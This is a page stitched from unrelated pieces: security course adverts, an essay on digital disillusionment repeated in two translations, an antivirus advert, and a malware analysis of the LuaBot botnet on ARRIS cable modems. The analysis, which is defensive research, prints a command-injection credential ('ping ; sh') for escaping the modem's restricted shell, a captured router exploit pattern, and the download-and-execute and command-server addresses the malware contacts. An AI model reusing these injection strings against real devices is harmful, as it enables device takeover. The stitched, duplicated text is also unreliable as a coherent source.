Mohamed Atef is an ICT Consultant, Senior Penetration Tester and certified instructor with more than 20 years of experience in professional and academic courses and two published books.

  • Certified Information System Security Professional (CISSP) ID #517943
  • Microsoft Certified Trainer (MCT) ID #3022752
  • EC Council Certified Instructor (CEI) ID #ECC51750391761
  • CEH: Certified Ethical Hacking ID #ECC64515022319
  • Certified Cisco System Instructor (CCSI)
  • Microsoft Certified System Engineer (MCSE)
  • Microsoft Certified IT Professional (Windows Server Administration 2008)
  • CompTIA Certified (Network +) ID #
  • CompTIA Certified (Server +)
  • CompTIA Certified (Linux +)
  • CompTIA Certified (Security +)
  • Cisco Certified Network Associate (CCNA) ID #CSCO11273248
  • Cisco Certified Network Professional (CCNP)
  • Project Management Professional (PMP) ID #1772374

Information Security Management Fundamentals


KEY FEATURES

Dive into the fundamentals of information security and essential cyber security principles with this immersive course! The world is constantly interconnected by networks, and companies have a vested interest in keeping the information on those networks secure. Therefore, they're willing to pay big bucks to information security professionals, and this course will teach you how to break into those elite ranks.

  • Access 74 lectures & 7.5 hours of content 24/7
  • Understand the fundamentals of information security management
  • Learn about hardening systems, basic network zones, IT personnel policies, & more
  • Discover disaster recovery basics
  • Discuss fundamental security threats, network security devices, access control concepts, & more
  • Better protect your business & IT infrastructure

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: beginner

Compatibility

  • Internet required

THE EXPERT

Alton Hardin is an educator, poker coach, self-published & best-selling author, and full-time IT and Business professional. Alton is the founder of MicroGrinder Poker School and the best-selling author of Essential Poker Math for No Limit Holdem; moreover, he is the creator of numerous online poker courses. Alton has been playing poker for over a decade both live and online. He helped pay his way through college playing live low stakes games in the early 2000's. Today, Alton enjoys playing the micro stakes for enjoyment and a teaching instrument, where he has racked up over $1,000 in earnings playing mainly 5nl & 10nl.

Outside of poker, Alton is a full-time business and IT professional, where he works in the field of cyber security. He has earned two graduate degrees, an M.B.A. and M.S. in IT Network Management; moreover, he currently holds multiple IT industry certifications.

Alton also has a fond love for teaching. As an undergraduate he group tutored chemistry students and as a graduate student he taught a GMAT prep course. Upon graduating from his MBA program, he began teaching as an adjunct professional for the School of Business & Public Administration at his local state university in the field of Information Systems and IT Management.

Web Security: Common Vulnerabilities & Their Mitigation


KEY FEATURES

The best way to protect yourself on the web is to actually learn how common attacks work so you can coat your online persona in a suit of armor. In this course, you'll walk through a wide range of web app security attacks and learn the exact steps you can take to mitigate each. Plus, you'll get the lowdown on how to adopt simple practices to keep yourself protected. By course's end, you'll be a security whiz.

  • Access 56 lectures & 8 hours of content 24/7
  • Understand how common web security attacks work
  • Learn how to write code to mitigate security risks
  • Implement secure coding practices to reduce vulnerabilities
  • Discuss security attacks like cross site scripting, session hijacking, credential management, SQL injection, & more

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels, but a basic understanding of JavaScript and PHP is encouraged

Compatibility

  • Internet required

THE EXPERT

Loonycorn is comprised of four individuals—Janani Ravi, Vitthal Srinivasan, Swetha Kolalapudi and Navdeep Singh—who have honed their tech expertise at Google and Flipkart. The team believes it has distilled the instruction of complicated tech concepts into funny, practical, engaging courses, and is excited to be sharing its content with eager students.

Wi-Fi Hacking with Kali


KEY FEATURES

Network security is essential to any home or corporate internet connection, which is why ethical hackers are paid big bucks to identify gaps and threats that can take a network down. In this course, you'll learn how to protect WEP, WPA, and WPA2 networks by using Kali Linux, one of the most popular distributions for ethical hackers. By course's end, you'll have the know-how to protect network environments like a pro.

  • Access 22 lectures & 1.5 hours of content 24/7
  • Set up a penetration testing environment
  • Learn 4 different ways to install & use Kali Linux
  • Understand how to hack WEP-protected WiFi & learn countermeasures
  • Discover how to hack WiFi using Hydra, a keylogger, or by removing devices

PRODUCT SPECS

Details & Requirements:

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: beginner

Compatibility:

  • Internet required

THE EXPERT

Amit Huddar is an Internet Entrepreneur and Software Engineer. He runs his own software company "Softdust," which develops products for new technologies like wearables and other gadgets. He opted for computer science engineering in 2013 at SSIT and started his software company in his first year of engineering.

His skills include Android app development, HTML, CSS, PHP, C, C++, Java, Linux, building custom Linux OS images, cloud computing, penetration testing, Kali Linux and hacking.

Digital sucks: Life in the Beta World

Can we talk? Digital sucks ... greatly! There is this nagging feeling that a lot of digital stuff is somehow going wrong. Digital products often fail to live up to their promises.

Take Twitter, for example. For a while it looked promising. But then came Trump. We enjoyed our Uber rides, only to witness a full-blown meltdown. Or consider the Internet of Things. We hoped for a future full of connected devices, but what we are experiencing instead are huge botnets that knock out large parts of the internet, and light bulbs that are vulnerable to virus attacks.

Once we listened faithfully to the promise of artificial intelligence. Now we worry that we will lose our jobs to machines and that AI will eventually take over the world and replace humans as the highest form of life on Earth. On top of that, we firmly believed in the internet as a powerful platform for a flourishing culture. Instead, we have become afraid that the internet will suck up creative content from all over the world until nothing is left (David Byrne, 2013).

Digital sucks! Or does it? One thing is certain: we live in a beta world. Nothing digital ever seems to be finished, and we are always waiting for the next update. Every update fixes old bugs and introduces new ones at the same time. We constantly live on the bleeding edge and take high risks with our use of technology and tools.

Are we dealing with a white elephant? We cannot simply dispose of our digital possessions, but all too often the costs are higher than their benefits.

The same question can be asked about digital transformation, especially looking back at the sky-high investments most companies have made over the past few years. A lot of time and money has flowed into shiny new digital projects, but has the probability of survival for these companies increased accordingly? Or do they still face the same major risks of disruption? "Software is eating the world", as Marc Andreessen once put it.

How could it happen that the land of digital utopia, populated by unicorns, may now turn into a dystopian nightmare? Every revolution has its costs. Those costs may be too high from the perspective of many people, but do those people have a say? Ironically, it was the relentless focus on the user of digital technology, the consumer, the human being, that made so many digital things so overwhelmingly successful. The same user who gained so much value from technology now feels that the price he will ultimately have to pay may be too high.

We deserve a better digital world

Digital shouldn't suck; not for customers, and not for employees and other stakeholders.

First of all, we have to admit that the tech utopia that emerged in the seventies was at least partly over-optimistic, rooted not so much in reality as in a kind of wishful thinking. Technology as such is not the solution to all kinds of problems; it is a tool that can be used in many different ways. The Californian Ideology was simply that: an ideology. As such it was certainly powerful, but sooner or later every ideology collides with a reality of a different kind.

That is exactly what is happening to Uber and, to a lesser extent, to Lyft. Both ridesharing services displayed a certain kind of arrogance when they pulled out of the Austin market after the city decided to require background checks for drivers. This was a classic example of a free-market ideology clashing with regulation.

In hindsight, that was only a grim foreshadowing of the PR disaster Uber faced in early 2017, when CEO Travis Kalanick was accused by an Uber driver of bad behaviour while allegations of systematic sexism and harassment surfaced at the same time. Uber had to learn the hard way that a toxic corporate culture and a blatant neglect of corporate responsibility can, and certainly will, come back to haunt a company and eventually hurt its performance. Digital shouldn't suck; not for customers, and not for employees and other stakeholders.

Digital value creation is based on the user's service experience

Second: as value creation migrates from other sectors of the economy into the digital sphere, this process inevitably goes hand in hand with the devaluation of traditional assets, skills and jobs. This shift is nothing special; it has happened before, first with the industrial revolution and later with the rise of the service sector. Solutions are needed to ease the transition, not to resist it, because resistance is futile. People will always flock to regions, industries and professions where value creation is higher than elsewhere. These days that is the case in the digital sphere.

Third, we must bear in mind that Twitter, like the internet, does not by itself lead to freedom of thought and expression. While it can empower users to raise their voices, it can also amplify the voices of those who already hold a huge mindshare. Donald Trump has proven that Twitter can reach huge masses of followers highly effectively, bypassing traditional media. The same goes for other platforms such as Facebook. While the digital field is indeed different, it is not entirely unlike the established media sphere. The attention economy favours those who understand how to attract the most attention. So it is up to us to decide whether we want to keep listening preferentially to whoever barks loudest, or whether we want to find new algorithms that give people better choices.

The same applies to pop culture. We have seen the rise of influencers and YouTube stars while the business models of the incumbents began to crumble and in some cases collapsed. It might look as if the internet were sucking up all creative content from around the world, as David Byrne put it. But a more realistic view would recognise that digital value creation simply differs from the business models of the past. Those were based on the scarcity of physical goods that could be packaged, priced and sold to a mass market. By comparison, digital value creation is based on the user's service experience. It still has a physical hardware component, but the software is far more important.

Streaming services such as Netflix and Spotify do not distribute DVDs or CDs; they sell monthly subscriptions for access to huge libraries of digital content. They learn user preferences and adapt their services to personal taste. Services like these can be more valuable to the user than traditional media packages. At the same time, they bind the user to time-consuming habits such as binge-watching. Both Netflix and Spotify are now increasingly moving into content creation, cutting out traditional intermediaries such as film studios and music labels. This structural change need not be bad for artists, at least if they learn how to play by the new rules.

The fourth product cycle is fuelled by AI

It seems that the prophets of the New Economy in the nineties were largely right when they touted the New Rules. What was wrong was the widespread expectation about the speed of change. How quickly users would adopt new behaviours was overestimated, but how far the changes would reach was underestimated. The same applies to the next tech cycle, fuelled by artificial intelligence (machine learning, deep learning) and voice-controlled interfaces such as Alexa and Siri.

AI, machine learning and deep learning have now reached a stage where machines essentially program themselves. That makes it very hard for humans to understand what these machines are actually doing. Expect a lot of heated debate on these questions in the near future. The strangely misguided argument about the ethics of self-driving cars deciding whether to kill their passenger or an innocent pedestrian is only a grim foretaste.

Voice interfaces rely heavily on AI algorithms and massive amounts of data as their backend and backbone. Better algorithms and data produce better interface quality, which in turn generates more and better data that can be used to develop more advanced algorithms and generate even more data. A self-reinforcing effect. The race for the next dominant platform has begun, and the winners will be those who best master the virtuous circle of data and interface quality.

We will see more and more algorithms and applications like the avatars of Soul Machine that are able to interact with people on an emotional level, that may even read our feelings better than humans do and respond to them in ways that were unimaginable until recently. How do we feel about that? After the earlier cycles (PC, web and mobile), the next transition may be even faster. While the PC took about 20 years to reach the mass market, the web needed only 15 years, and it looks as if the current mobile cycle will be complete after ten. Around 2025 we will see whether the fourth cycle completes in only five years and perhaps reaches even more people than the smartphone.

Will we soon see the killer application of IoT?

While machine learning and voice interfaces are already showing promising use cases, the Internet of Things does not seem to have any yet. IoT looks a lot like mobile before the iPhone existed. Today, IoT devices often just add complexity to otherwise simple use cases such as room lighting or heating. The smart home we have been promised for some time now does not look particularly smart yet.

There is an enormous need to redesign the user experience of buildings, offices and homes. That experience has remained fundamentally unchanged for decades, and current IoT devices merely digitise familiar interfaces without rethinking them and changing them from the ground up. This work needs to be done, and it will be done, with huge rewards for those who manage to become the dominant digital platforms for real estate.

In the long run, large parts of the gigantic real estate market can and probably will be turned into a digital service business living on platforms such as Airbnb. Users will rent fully equipped houses, apartments and office space for a limited time or even long term. Every aspect of the building will fit neatly into a single monthly bill, with all services metered and billed digitally and automatically. This is the killer application of IoT, but it may take some time to develop fully.

How to build products that serve people

Digital product development is hard, can fail, and there are no shortcuts. Like any innovation, it is risky. Ultimately, product innovation is the discovery of new customer value. Transformational products have a radical value proposition, and they deliver immediately instead of promising things they cannot deliver. A positive experience for the user is the first step towards a lasting change in behaviour. To change user expectations, user behaviour and, not least, value creation, creating added value is the secret recipe of successful digital transformation.


Kompas Antivirus, the Most Powerful Antivirus from Indonesia

Kompas Antivirus is an antivirus program with the largest database in Indonesia, intended to protect computers from malware threats. Detection is focused on newer malware such as botnets, spyware, keyloggers, password stealers, trojan downloaders, binders, crypters and others. Kompas Antivirus is reliable at detecting malware that spreads via USB flash drives, leaving malware no opening to infect your computer. The malware database is updated regularly so that new malware and viruses can be detected. Trust the protection of your computer to Kompas Antivirus.


Kompas Antivirus features:
  • The fastest and lightest antivirus in memory usage.
  • Can be integrated with the ClamAV database using the kclam.dll plugin, enabling detection of more than 3 million viruses.
  • Intercepts virus processes in real time (Pro version).
  • An interface that makes it easy for users to use all features.
  • Focus on protection against data theft threats.
  • Advanced heuristic module for detecting viruses that infect exe files, such as Sality and Virut.
  • Advanced heuristic module for detecting encrypted malware.
  • Advanced heuristic module for detecting malware on USB flash drives.
  • Advanced heuristic module for detecting VBS and shortcut worms.
  • Automatic scanning of files on inserted USB flash drives.
  • Automatic scanning of files on the system.
  • Scanning of files inside archives (Rar/Zip).
  • Automatic online updates for the virus database and program modules.
  • Daily updates of the virus signature database.
  • Additional tools to make cleaning up viruses easier, and more.


           Digital sucks: Life in the beta world    

Can we talk? Digital sucks ... greatly! There is this nagging feeling that a lot of digital stuff is somehow going wrong. Digital products often fail to live up to their promises.

Take Twitter, for example. For a while it looked promising. But then came Trump. We enjoyed our Uber rides, only to witness a full-blown meltdown. Or think of the Internet of Things. We hoped for a future full of connected devices, but what we get instead are gigantic botnets that take down large parts of the internet, and light bulbs that are vulnerable to virus attacks.

Once we listened faithfully to the promise of artificial intelligence. Now we worry that we will lose our jobs to machines and that AI will eventually take over the world and replace humans as the highest form of life on earth. Beyond that, we firmly believed in the internet as a powerful platform for a flourishing culture. Instead, we have come to fear that the internet will suck up all the creative content in the world until nothing is left (David Byrne, 2013).

Digital sucks! Or does it? One thing is certain: we live in a beta world. Nothing digital ever seems to be finished, and we are always waiting for the next update. Every update fixes old bugs and introduces new ones at the same time. We constantly live on the bleeding edge and take high risks with our use of technology and tools.

Are we dealing with a white elephant? We cannot simply dispose of our digital possessions, yet their costs are all too often higher than their benefits.

The same question can be asked about digital transformation, especially looking back at the sky-high investments most companies have made over the past few years. A lot of time and money went into shiny new digital projects, but has the probability of survival for these companies increased accordingly? Or are they still facing the same great risks of disruption? "Software is eating the world", as Marc Andreessen once put it.

How could it happen that the land of digital utopia, populated by unicorns, might now be turning into a dystopian nightmare? Every revolution has its costs. From the perspective of many people these costs may be too high, but do those people have a say? Ironically, it was the relentless focus on the user of digital technology, the consumer, the human being, that made so many digital things so overwhelmingly successful. The same user to whom technology has brought so much added value now feels that the price they end up paying might be too high.

We deserve a better digital world

Digital shouldn't suck; neither for customers nor for employees and other stakeholders.

First of all, we have to admit that the tech utopia that emerged in the seventies was at least partly over-optimistic and rooted not so much in reality as in a kind of wishful thinking. Technology in itself is not the solution to every kind of problem; it is a tool that can be used in many different ways. The Californian Ideology was simply that: an ideology. As such it was certainly powerful, but sooner or later every ideology collides with a reality that looks different.

That is exactly what is happening with Uber and, to a lesser extent, with Lyft. Both ridesharing services displayed a certain kind of arrogance when they withdrew from the Austin market after the city decided to require background checks for drivers. This was a classic example of a free-market ideology clashing with regulation.

In hindsight, though, that was only a grim foreshadowing of the PR disaster Uber faced in early 2017, when CEO Travis Kalanick was accused by an Uber driver of bad behaviour while allegations of systematic sexism and harassment surfaced at the same time. Uber had to learn the hard way that a toxic company culture and a blatant neglect of corporate responsibility can and certainly will come back to haunt the company, ultimately hurting its performance.

Digital value creation is based on the user's service experience

Second: as value creation migrates from other sectors of the economy into the digital sphere, this process inevitably goes hand in hand with the devaluation of traditional assets, skills and jobs. This shift is nothing special; it has happened before, first with the industrial revolution and later with the rise of the service sector. Solutions are needed to ease the transition, not to resist it, because resistance is futile. People will always flock to regions, industries and professions where value creation is higher than elsewhere. These days, that is the digital sphere.

Third, we have to keep in mind that Twitter, like the internet, does not by itself lead to freedom of thought and expression. While it can empower users to raise their voices, it can also amplify the voices of those who already hold a huge mindshare. Donald Trump has proven that Twitter can reach huge masses of followers highly effectively, bypassing traditional media. The same goes for other platforms like Facebook. While the digital field is indeed different, it is not entirely unlike the established media sphere. The attention economy favours those who understand how to attract the most attention. So it is up to us to decide whether we want to keep listening preferentially to whoever barks loudest, or whether we want to find new algorithms that give people better choices.

The same goes for pop culture. We have seen the rise of influencers and YouTube stars while the business models of the incumbents began to crumble and, in some cases, collapsed. It might look as though the internet were sucking up all the creative content in the world, as David Byrne put it. But a more realistic view would recognise that digital value creation simply differs from the business models of the past. Those were based on the scarcity of physical goods that could be packaged, priced and sold to a mass market. By comparison, digital value creation is based on the user's service experience. It still has a physical hardware component, but the software matters far more.

Streaming services like Netflix and Spotify do not distribute DVDs or CDs; they sell monthly subscriptions for access to huge libraries of digital content. They learn user preferences and tailor their services to personal taste. Services like these can be more valuable to the user than traditional media packages. At the same time, they tie the user to time-consuming habits such as binge-watching. Both Netflix and Spotify are now increasingly moving into content creation, cutting out traditional intermediaries such as film studios and music labels. This structural change does not have to be bad for artists, at least if they learn how to play by the new rules.

The fourth product cycle is fuelled by AI

It seems that the prophets of the New Economy in the nineties were largely right when they touted the New Rules. What was wrong, however, was the widespread expectation about the speed of change. How quickly users would adopt new behaviours was overestimated, but how far the changes would reach was underestimated. The same applies to the next tech cycle, fuelled by artificial intelligence (machine learning, deep learning) and voice-controlled interfaces such as Alexa and Siri.

AI, machine learning and deep learning have now reached a stage where machines essentially program themselves. That makes it very hard for humans to understand what these machines are actually doing. Expect a lot of heated debate about these questions in the near future. The strangely misguided argument about the ethics of self-driving cars deciding whether to kill their passenger or an innocent pedestrian is only a grim foreshadowing.

Voice interfaces rely heavily on AI algorithms and massive amounts of data as their backend and backbone. Better algorithms and data produce better interface quality, which in turn generates more and better data that can be used to develop more advanced algorithms and generate even more data. A self-reinforcing effect. The race for the next dominant platform has begun, and the winners will be those who best master the virtuous circle of data and interface quality.

We will see more and more algorithms and applications like the avatars from Soul Machine that are able to interact with people on an emotional level, that may even read our feelings better than humans do and respond to them in ways that were unimaginable until recently. How do we feel about that? After the earlier cycles (PC, web and mobile), the next transition may be even faster. While the PC took about 20 years to reach the mass market, the web needed only 15 years, and it looks as though the current mobile cycle will be complete after ten years. Around 2025 we will see whether the fourth cycle will be completed in just five years, perhaps reaching even more people than the smartphone.

Will we soon see the killer application of IoT?

While machine learning and voice interfaces already show promising use cases, the Internet of Things does not seem to have any yet. IoT looks a lot like mobile before the iPhone. Today, IoT devices often just add complexity to otherwise simple use cases such as room lighting or heating. The smart home we have been promised for some time does not look particularly smart yet.

There is a huge need to redesign the user experience of buildings, offices and homes. That experience has remained fundamentally unchanged for decades, and current IoT devices merely digitise familiar interfaces without rethinking them and changing them from the ground up. This work has to be done, and it will be done, with huge rewards for those who manage to become the dominant digital platforms for real estate.

In the long run, large parts of the gigantic real-estate market can and probably will be turned into a digital service business living on platforms like Airbnb. Users will rent fully equipped houses, apartments and office space for a limited time or even long-term. Every aspect of the building will fit neatly into a single monthly bill, with all services metered and billed digitally and automatically. This is the killer application of IoT, but it may take some time to develop it fully.

How to build products that serve people

Digital product development is hard, can fail, and there are no shortcuts. Like any innovation, it is risky. Ultimately, product innovation is the discovery of new customer value. Transformational products have a radical value proposition, and they deliver immediately instead of promising things they cannot deliver. A positive experience for the user is the first step towards sustainable behavioural change. To change user expectations, user behaviour and, not least, value creation, creating added value is the secret recipe of successful digital transformation.


          LuaBot: Malware targeting cable modems   
During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a blog post about ARRIS' nested backdoor and detailed some of my cable modem research at the 2015 edition of the NullByte Security Conference.

CERT/CC released the Vulnerability Note VU#419568 and it got lots of media coverage. I did not provide any PoCs at that time because I was pretty sure that those vulnerabilities were easily wormable... And guess what? Someone has been actively exploiting those devices since May 2016.

The malware targets Puma 5 (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many common worms that target embedded devices of multiple architectures. The final stage is an ARMEB version of the LuaBot malware.


The ARMEL version of the LuaBot malware was dissected in a blog post from Malware Must Die, but this specific ARMEB build was still unknown and undetected at the time. The malware was initially sent to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.



Cable Modem Security and ARRIS Backdoors

Before we go any further, if you want to learn about cable modem security, grab the slides from my talk "Hacking Cable Modems: The Later Years". The talk covers many aspects of the technology used to manage cable modems, how the data is protected, how ISPs upgrade the firmware and so on.


Pay special attention to the slide #86:


I received some reports that malware creators are remotely exploiting those devices in order to dump the modem's configuration and steal private certificates. Some users also reported that those certificates are being sold for bitcoin to modem cloners all around the world. The report from Malware Must Die! also points out that LuaBot is being used for flooding/DDoS attacks.


Exploit and Initial Infection

The LuaBot malware is part of a bigger botnet targeting embedded devices of multiple architectures. After examining some infected systems, I noticed that most cable modems were compromised through a command injection in the restricted CLI reachable via the ARRIS Password of The Day backdoor.

Telnet honeypots like the one from nothink.org have been logging these exploit attempts for some time. They record many apparent attempts to brute-force the username "system" and the password "ping ; sh", but these are, in fact, commands used to escape from the restricted ARRIS telnet shell.


The initial dropper is created by echoing shell commands to the terminal to create a standard ARM ELF.


I have cross-compiled and uploaded a few debugging tools to my cross-utils repository, including gdbserver, strace and tcpdump. I also happen to have a vulnerable ARRIS TG862, so I can perform dynamic analysis in a controlled environment.

If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:

./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop
connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device)

The command is simple download-and-execute ARMEB shellcode. The malicious IP 46.148.18.122 is known for brute-forcing SSH servers and trying to exploit Linksys router command injections in the wild. After downloading the second-stage malware, the script echoes the following string:
echo -e 61\\\\\\x30ck3r

This pattern is particularly interesting because it is quite similar to the one reported by ProtectWise in "Observing Large-Scale Router Exploit Attempts":
cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

The second-stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules allowing remote access from very specific subnets and blocking external access to ports 8080, 80, 433, 23 and 22:


These rules block external exploit attempts against the ARRIS services/backdoors, restricting access to networks controlled by the attacker.

After setting up the rules, two additional binaries are transferred and started by the attacker. The first one, .sox.rslv (889100a188a42369fd93e7010f7c654b), is a simple DNS query tool based on udns 0.4.



The other binary, .sox (4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities, including SOCKS/proxy, DNS and IPv6.



Parts of the code resemble some shadowsocks-libev functionality, and there's an interesting reference to the whrq[.]net domain, which seems to be used as a dnscrypt gateway:



All these binaries are used as auxiliary tools for LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable cable modems.

UPDATE: According to this interview with the supposed malware author, "reversers usually get it wrong and say there’s some modules for my bot, but those actually are other bots, some routers are infected with several bots at once. My bot never had any binary modules and always is one big elf file and sometimes only small <1kb size dropper"


Final Stage: LuaBot

The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled using the same Puma5 toolchain as the one I made available in my cross-utils repository.


If we use strace to perform dynamic analysis, we can see the greetings from the bot's author and the creation of a mutex (bbot_mutex_202613). Then the bot starts listening on port 11833 (TCP) and tries to contact the command and control server at 80.87.205.92.


In order to understand how the malware works, let's mix some manual and dynamic analysis. Time to analyse the binary using IDA Pro and...

Reversing stripped binaries

The binaries are stripped and IDA Pro's F.L.I.R.T. didn't recognize the standard library function calls in our ARMEB binary. Instead of spending hours manually reviewing the code, we can use @matalaz's diaphora diffing plugin to port all the symbols.

First, we need to export the symbols from the Puma5 toolchain's uClibc. Download the prebuilt toolchain here and open the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" in IDA Pro. Choose File/Script File (Alt+F7), load diaphora.py, select a location to export the IDA database to SQLite, tick "Export only non-IDA generated functions" and hit OK.

When it finishes, close the current IDA database and open the binary arm_puma5. Rerun the diaphora.py script and this time choose the SQLite database to diff against:


After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.

Browse the "Best matches" tab, right-click on the list, select "Import *all* functions" and choose not to relaunch the diffing process when it finishes. Now head to the "Partial matches" tab, delete everything with a low ratio (I removed everything below 0.8), right-click on the list and select "Import all data for sub_* function":


The IDA strings window displays lots of information related to the Lua scripting language. For this reason, I also cross-compiled Lua to ARMEB, loaded the "lua" binary into IDA Pro and repeated the diffing process with diaphora:


We're almost done now. If you google some of the debug messages present in the code, you can find a deleted Pastebin that was cached by Google.



I downloaded the C code (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? Diffing again =)



The disassembly is far more legible now. There's a built-in Lua interpreter and some native code related to event sockets. The list of the botnet commands is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:


The bot starts by setting up the Lua environment, unpacks the code and then forks, waiting for instructions from the command and control server. The malware author packed the Lua source code as a GZIP blob, making the entire reversing job easier for us, as we don't have to deal with Lua bytecode.


The blob at 0xA40B8 contains a standard GZ header with the last-modified timestamp 2016-04-18 17:35:34:
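One way to pull such a packed blob out of the binary yourself, as an added example that is not code from the post or from LuaBot: scan the file for gzip members, parse the RFC 1952 header (including the MTIME field the post reads off the blob), inflate the raw deflate stream and verify the CRC32/ISIZE trailer so that a stray 1f 8b 08 byte sequence is not mistaken for the real blob. The sample buffer and its Lua text are constructed placeholders, with the MTIME set to the timestamp quoted above:

```python
"""Carve gzip members out of a binary and read their headers.

Added example; not the post's code and not LuaBot's. Finds every gzip member in a
byte buffer, parses the RFC 1952 header, inflates the payload and checks the
trailer, rejecting magic bytes that do not start a real member.
"""
import gzip
import struct
import zlib
from datetime import datetime, timezone

GZIP_MAGIC = b"\x1f\x8b\x08"                   # ID1, ID2, CM = 8 (deflate)
FHCRC, FEXTRA, FNAME, FCOMMENT = 2, 4, 8, 16     # FLG bits, RFC 1952


def parse_gzip_header(buf, off):
    """Return header fields for the member at buf[off:], or None if malformed.
    'data_offset' is where the deflate stream starts after the optional fields."""
    if buf[off:off + 3] != GZIP_MAGIC or off + 10 > len(buf):
        return None
    flg, mtime, xfl, os_id = struct.unpack_from("<BIBB", buf, off + 3)
    pos = off + 10
    if flg & FEXTRA:                             # 2-byte XLEN + XLEN extra bytes
        if pos + 2 > len(buf):
            return None
        pos += 2 + struct.unpack_from("<H", buf, pos)[0]
    for bit in (FNAME, FCOMMENT):                # zero-terminated strings
        if flg & bit:
            end = buf.find(b"\x00", pos)
            if end < 0:
                return None
            pos = end + 1
    if flg & FHCRC:                              # 16-bit header CRC
        pos += 2
    if pos > len(buf):
        return None
    return {"offset": off, "flg": flg, "mtime": mtime, "xfl": xfl,
            "os": os_id, "data_offset": pos}


def inflate_member(buf, hdr):
    """Inflate one member and verify its trailer; sets hdr['end'] to the offset just
    past the member. Raises ValueError/zlib.error if the bytes are not a member."""
    d = zlib.decompressobj(-zlib.MAX_WBITS)      # raw deflate, no wrapper
    payload = d.decompress(buf[hdr["data_offset"]:])
    if not d.eof:
        raise ValueError("truncated deflate stream")
    trailer = d.unused_data                      # CRC32 + ISIZE, then whatever follows
    if len(trailer) < 8:
        raise ValueError("missing gzip trailer")
    crc, isize = struct.unpack("<II", trailer[:8])
    if crc != zlib.crc32(payload) & 0xFFFFFFFF or isize != len(payload) & 0xFFFFFFFF:
        raise ValueError("CRC32/ISIZE mismatch: not a valid gzip member")
    hdr["end"] = len(buf) - len(trailer) + 8
    return payload


def carve_gzip(buf):
    """Return [(header, payload)] for every valid gzip member in buf, in order."""
    found = []
    off = buf.find(GZIP_MAGIC)
    while off != -1:
        hdr = parse_gzip_header(buf, off)
        if hdr is not None:
            try:
                found.append((hdr, inflate_member(buf, hdr)))
                off = buf.find(GZIP_MAGIC, hdr["end"])
                continue
            except (ValueError, zlib.error):
                pass                             # magic bytes without a real member
        off = buf.find(GZIP_MAGIC, off + 1)
    return found


def mtime_utc(mtime):
    """Render the header MTIME (Unix time, 0 = unset) the way the post shows it."""
    if mtime == 0:
        return None
    return datetime.fromtimestamp(mtime, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


# Constructed sample: ELF-like filler around one gzip member whose MTIME is the
# timestamp the post reports for the real blob. The Lua text is a placeholder.
_LUA = b"-- placeholder, not LuaBot source\nlocal M = {}\nreturn M\n"
_MTIME = int(datetime(2016, 4, 18, 17, 35, 34, tzinfo=timezone.utc).timestamp())
SAMPLE_BIN = b"\x7fELF" + b"\x00" * 64 + gzip.compress(_LUA, mtime=_MTIME) + b"\xff" * 16


def summarize(buf=SAMPLE_BIN):
    """Per-member summary: offsets, MTIME, OS byte, payload size and a text preview."""
    return [{"offset": h["offset"], "end": h["end"], "mtime": mtime_utc(h["mtime"]),
             "os": h["os"], "size": len(p), "preview": p[:40].decode("latin-1")}
            for h, p in carve_gzip(buf)]


if __name__ == "__main__":
    for member in summarize():
        print(member)
```

Run it against a dumped binary by passing its bytes to summarize(); a member whose trailer does not check out is skipped rather than reported.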


Another easy way to unpack the Lua code is to attach your favorite debugger (gef, of course) to the running binary and dump the process memory (heap).

First, copy gdbserver to the cable modem, run the malware (arm_puma5) and attach the debugger to the corresponding PID:
./gdbserver --multi localhost:12345 --attach 1058


Then, start gef/GDB and attach it to the running server:
gdb-multiarch -q
set architecture arm
set endian big
set follow-fork-mode child
gef-remote 192.168.100.1:12345


Lastly, list the memory regions and dump the heap:
vmmap
dump memory arm_puma5-heap.mem 0x000c3000 0x000df000


That's it, now you have the full source code of LuaBot:


The LuaBot source code is composed of several modules:


The bot settings, including the DNS recursor and the CnC settings, are hardcoded:


The code is really well documented and it includes proxy checking functions and a masscan log parser:


The bot author seeds random with /dev/urandom (cryptographers rejoice):


LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:


Meterpreter is so 2000s; the V7 JavaScript interpreter is named shiterpreter:


There's a catchy function named checkanus.penetrate_sucuri, in what seems to be some sort of bypass for Sucuri's Denial of Service (DDoS) Protection:



LuaBot has its own Lua resolver function for DNS queries:


Most of the bot's capabilities are in line with the ones described in the Malware Must Die! blog post. It's interesting to note that the IPs of the CnC server and those in the iptables rules don't overlap, probably because they're using different environments for different bot families (or they were simply updated).

I did not analyse the remote botnet structure, but the modular approach and the interoperability of the malware indicate a professional and ongoing effort.


Conclusion

The analysed malware doesn't have any persistence mechanism to survive reboots. It doesn't try to reflash the firmware or modify volatile partitions (NVRAM for example), but the first-stage payload restricts remote access to the device using custom iptables rules.

